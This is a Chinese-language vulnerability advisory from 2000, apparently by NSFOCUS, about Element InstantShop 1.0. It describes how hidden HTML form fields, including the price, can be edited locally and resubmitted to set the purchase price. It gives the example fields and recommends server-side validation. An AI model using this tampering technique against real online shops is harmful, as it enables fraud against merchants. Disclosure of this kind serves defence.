发布日期：2000-10-26
更新日期：2000-10-26

受影响系统：

    Element N.V Element InstantShop 1.0
       - Microsoft Windows NT 4.0

描述：

---

Element N.V. 用于电子商务，它所使用的表单中存在隐含子段，可以把页面保存到
本地，修改隐含子段的值并重新提交表单。该漏洞允许用户自己修改商品单价。

<* 来源：Zoa_Chien (zoachien@securax.org) *>




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

例如，将下列表单
<INPUT TYPE = HIDDEN NAME = "product" VALUE = "blah-blah">
<INPUT TYPE = HIDDEN NAME = "name" VALUE = "blah-blah" >
<INPUT TYPE = HIDDEN NAME = "price" VALUE = "1">
--> 修改下列变量的数值：
<INPUT TYPE = HIDDEN NAME = "weight" VALUE = "1">
<INPUT TYPE = HIDDEN NAME = "shopperid" VALUE = "">
<INPUT TYPE = HIDDEN NAME = "departement" VALUE = "11">
<INPUT TYPE = HIDDEN NAME = "index" VALUE = "1">



建议：

---

临时解决方法：

NSFOCUS建议您修改源程序，检查隐藏变量是否被修改过或者暂时禁用此程序。

厂商补丁：

暂无

浏览次数：5642
严重程度：0（网友投票）